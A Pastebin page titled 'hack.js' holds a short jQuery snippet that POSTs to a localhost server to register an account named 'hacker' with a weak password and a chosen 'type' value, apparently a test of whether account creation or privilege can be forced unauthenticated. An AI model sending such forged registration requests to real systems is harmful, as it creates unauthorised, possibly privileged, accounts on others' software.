Guest User

hack.js

a guest
Feb 2nd, 2018
36
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.16 KB | None | 0 0
  1. $.ajax({
  2. method: 'POST',
  3. url: 'http://localhost:4050/',
  4. data: {
  5. username: 'hacker',
  6. password: '123456',
  7. type: '1',
  8. email: 'hacker@cofano.nl'
  9. }
  10. });
Add Comment
Please, Sign In to add comment